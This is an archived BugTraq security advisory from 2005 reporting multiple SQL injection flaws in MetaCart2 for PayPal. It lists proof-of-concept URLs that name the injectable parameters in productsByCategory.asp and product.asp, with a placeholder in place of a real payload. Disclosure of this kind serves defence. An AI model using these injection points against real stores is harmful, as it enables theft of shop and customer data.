BugTraq
Multiple SQL Injections in MetaCart2 for PayPal Apr 26 2005 02:35PM
dcrab (dcrab hackerscenter com)


Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc.
Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Multiple SQL Injections in MetaCart2 for PayPal
Date: 27/04/2005

Vendor: MetaCart
Vendor Website: www.metalinks.com
Summary: There are, multiple sql injections in metacart2 for paypal.

Proof of Concept Exploits:

http://example.com/mcart2pal/productsByCategory.asp?intCatalogID='SQL_IN
JECTION&%3bstrCatalog_NAME=Computers
SQL INJECTIONS

http://example.com/mcart2pal/productsByCategory.asp?strSubCatalogID='SQL
_INJECTION&%3bcurCatalogID=10001&%3bstrSubCatalog_NAME=Laptops
SQL INJECTIONS

http://example.com/mcart2pal/productsByCategory.asp?strSubCatalogID=1&am
p%3bcurCatalogID='SQL_INJECTION&%3bstrSubCatalog_NAME=Laptops
SQL INJECTIONS

http://example.com/mcart2pal/productsByCategory.asp?strSubCatalogID=1&am
p%3bcurCatalogID=10001&%3bstrSubCatalog_NAME='SQL_INJECTION
SQL INJECTIONS

http://example.com/mcart2pal/product.asp?intProdID='SQL_INJECTION
SQL INJECTIONS

http://example.com/mcart2pal/productsByCategory.asp?intCatalogID=&%3b
page=2&%3bstrCatalog_NAME='SQL_INJECTION
SQL INJECTIONS

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilties have been found and released by Diabolic Crab, Email:
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact
me regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my
soon to come out book on Secure coding with php.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus